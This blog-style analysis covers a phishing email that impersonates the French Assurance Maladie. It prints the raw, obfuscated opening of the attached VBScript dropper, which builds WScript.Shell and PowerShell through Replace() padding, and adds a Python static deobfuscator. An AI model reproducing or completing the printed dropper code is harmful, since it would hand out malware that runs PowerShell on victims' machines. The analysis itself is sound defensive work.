Quick analysis of a virus
I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), which tells me to download my tax statement which they have graciously attached.
There are multiple things to notice here:
- the sender address: [email protected]
- onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
- the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French
Now, the attachments.
No PDF file, which is unusual since it's quite common for this kind of spam. But rejoice! We have a VBScript file right there.
(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)
Here is the VBS file, raw as I received it:
on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = " $00Q1KNH<##>='(New-';
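The two Replace() calls and the colon-chained statements in the script above can be resolved statically, without ever running the sample. The following is an added example, not part of the original post: the function names are my own, and the input is the opening of the script copied verbatim.

```python
import re

# Constructed input: opening statements of the script above (payload string omitted).
SAMPLE = (
    'on error resume next:on error resume next:'
    'JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):'
    'Set cfAKtQG = CreateObject(JPHgjNP ):'
    'izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):'
    'WScript.Sleep 2000:WScript.Sleep 2000'
)

LIT = r'"((?:[^"]|"")*)"'   # VBScript string literal; "" is an escaped quote
REPLACE_CALL = re.compile(
    r'\breplace\s*\(\s*' + LIT + r'\s*,\s*' + LIT + r'\s*,\s*' + LIT + r'\s*\)',
    re.IGNORECASE)
ASSIGNMENT = re.compile(r'^(\w+)\s*=\s*' + LIT + r'$')
STATEMENT = re.compile(r'(?:' + LIT + r'|[^:"])+')  # runs with no ':' outside strings

def fold_replace_calls(source):
    """Evaluate Replace() calls whose three arguments are all literals."""
    def fold(match):
        text, find, repl = (g.replace('""', '"') for g in match.groups())
        # Replace() compares case-sensitively by default, like str.replace;
        # an empty search string leaves the text unchanged in VBScript.
        result = text.replace(find, repl) if find else text
        return '"' + result.replace('"', '""') + '"'
    return REPLACE_CALL.sub(fold, source)

def split_statements(source):
    """Split on ':' separators that are outside string literals."""
    chunks = (m.group(0).strip() for m in STATEMENT.finditer(source))
    return [c for c in chunks if c]

def deobfuscate(source):
    """Return ([(statement, repeat_count)], {variable: resolved string})."""
    statements, constants = [], {}
    for stmt in split_statements(fold_replace_calls(source)):
        if statements and statements[-1][0].lower() == stmt.lower():
            statements[-1] = (stmt, statements[-1][1] + 1)  # collapse padding
        else:
            statements.append((stmt, 1))
        m = ASSIGNMENT.match(stmt)
        if m:
            constants[m.group(1)] = m.group(2).replace('""', '"')
    return statements, constants
```

Calling `deobfuscate(SAMPLE)` shows that the two junk-padded strings resolve to a shell object name and the PowerShell executable name, which is what the rest of the script builds its command line on.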